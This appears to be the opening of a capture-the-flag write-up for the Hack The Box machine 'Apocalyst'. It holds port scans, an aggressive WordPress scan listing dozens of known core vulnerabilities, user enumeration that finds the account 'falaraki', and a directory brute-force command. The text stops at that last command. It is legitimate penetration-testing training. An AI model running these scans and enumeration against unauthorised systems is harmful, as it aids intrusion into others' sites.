Apocalyst
Contents
Ports scan
u505@kali:~/HTB/Machines/Apocalyst$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.46
Starting masscan 1.0.5 at 2020-05-12 11:05:35 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.46 Discovered open port 80/tcp on 10.10.10.46
u505@kali:~/HTB/Machines/Apocalyst$ nmap -sC -sV 10.10.10.46 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 07:05 EDT Nmap scan report for apocalyst.htb (10.10.10.46) Host is up (0.042s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA) | 256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA) |_ 256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apocalypse Preparation Blog Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds
Web Server
The web server presents a wordpress blog about the apocalypse.
Wpscan
u505@kali:~/HTB/Machines/Apocalyst$ wpscan --url http://10.10.10.46 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <AP token>
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.46/ [10.10.10.46]
[+] Started: Tue May 12 07:10:12 2020
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://10.10.10.46/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.46/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.46/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.46/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Atom Generator (Aggressive Detection)
| - http://10.10.10.46/?feed=atom, <generator uri="https://wordpress.org/" version="4.8">WordPress</generator>
| Confirmed By: Style Etag (Aggressive Detection)
| - http://10.10.10.46/wp-admin/load-styles.php, Match: '4.8'
|
| [!] 43 vulnerabilities identified:
|
| [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8905
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
|
| [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41398
|
| [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41457
| - https://hackerone.com/reports/205481
|
| [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41397
|
| [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41448
|
| [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8914
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41395
| - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
|
| [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
| References:
| - https://wpvulndb.com/vulnerabilities/8807
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
| - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
| - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
| - https://core.trac.wordpress.org/ticket/25239
|
| [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
| Fixed in: 4.8.3
| References:
| - https://wpvulndb.com/vulnerabilities/8941
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
| - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
| - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
| - https://twitter.com/ircmaxell/status/923662170092638208
| - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
|
| [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8966
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8967
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8968
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8969
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
| Fixed in: 4.8.5
| References:
| - https://wpvulndb.com/vulnerabilities/9006
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263
| - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
| - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
| References:
| - https://wpvulndb.com/vulnerabilities/9021
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
| - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
| - https://github.com/quitten/doser.py
| - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
| Fixed in: 4.8.6
| References:
| - https://wpvulndb.com/vulnerabilities/9053
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
| Fixed in: 4.8.6
| References:
| - https://wpvulndb.com/vulnerabilities/9054
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
| Fixed in: 4.8.6
| References:
| - https://wpvulndb.com/vulnerabilities/9055
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.8.7
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
|
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
| Fixed in: 5.0.1
| References:
| - https://wpvulndb.com/vulnerabilities/9222
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
| - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
| - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
|
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
| Fixed in: 4.8.9
| References:
| - https://wpvulndb.com/vulnerabilities/9230
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
| - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
| - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
| - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
|
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 4.8.10
| References:
| - https://wpvulndb.com/vulnerabilities/9867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
| - https://hackerone.com/reports/339483
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/9973
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
|
| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/9975
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://hackerone.com/reports/509930
| - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
|
| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/9976
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
|
| [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/10004
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
|
| [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10201
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47634/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
|
| [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10202
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47635/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10203
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47633/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
|
| [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10205
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47637/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10206
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47638/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <> (328 / 328) 100.00% Time: 00:00:03
[+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.46/wp-content/themes/twentyfifteen/
| Latest Version: 2.6
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://10.10.10.46/wp-content/themes/twentyfifteen/readme.txt
| Style URL: http://10.10.10.46/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
| Author: the WordPress team
| Author URI: https://wordpress.org/
| License: GNU General Public License v2 or later
| License URI: http://www.gnu.org/licenses/gpl-2.0.html
| Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
| Text Domain: twentyfifteen
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.46/wp-content/themes/twentyfifteen/, status: 500
|
| [!] 1 vulnerability identified:
|
| [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)
| Fixed in: 1.2
| References:
| - https://wpvulndb.com/vulnerabilities/7965
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429
| - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
| - https://packetstormsecurity.com/files/131802/
| - https://seclists.org/fulldisclosure/2015/May/41
|
| The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=======> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:00 <> (0 / 100) 0.00% ETA: ??:??:? Brute Forcing Attachment IDs - Time: 00:00:00 <> (1 / 100) 1.00% ETA: 00:00:1 Brute Forcing Attachment IDs - Time: 00:00:00 <> (2 / 100) 2.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (6 / 100) 6.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (7 / 100) 7.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (11 / 100) 11.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (12 / 100) 12.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (17 / 100) 17.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (22 / 100) 22.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (27 / 100) 27.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (32 / 100) 32.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (37 / 100) 37.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (42 / 100) 42.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (47 / 100) 47.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (52 / 100) 52.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (57 / 100) 57.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (62 / 100) 62.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (67 / 100) 67.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (72 / 100) 72.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (73 / 100) 73.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (77 / 100) 77.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (78 / 100) 78.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (83 / 100) 83.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (88 / 100) 88.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (93 / 100) 93.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (98 / 100) 98.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (100 / 100) 100.00% Time: 00:00:02
[i] Medias(s) Identified:
[+] http://10.10.10.46/?attachment_id=11
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.46/?attachment_id=12
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] Enumerating Users (via Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] falaraki
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 48
[+] Finished: Tue May 12 07:10:25 2020
[+] Requests Done: 541
[+] Cached Requests: 7
[+] Data Sent: 122.1 KB
[+] Data Received: 487.258 KB
[+] Memory used: 246.188 MB
[+] Elapsed time: 00:00:12
The more relevant information is the username.
Dirsearch
u505@kali:~/HTB/Machines/Apocalyst$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 1000 -u http://10.10.10.46 _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 9189
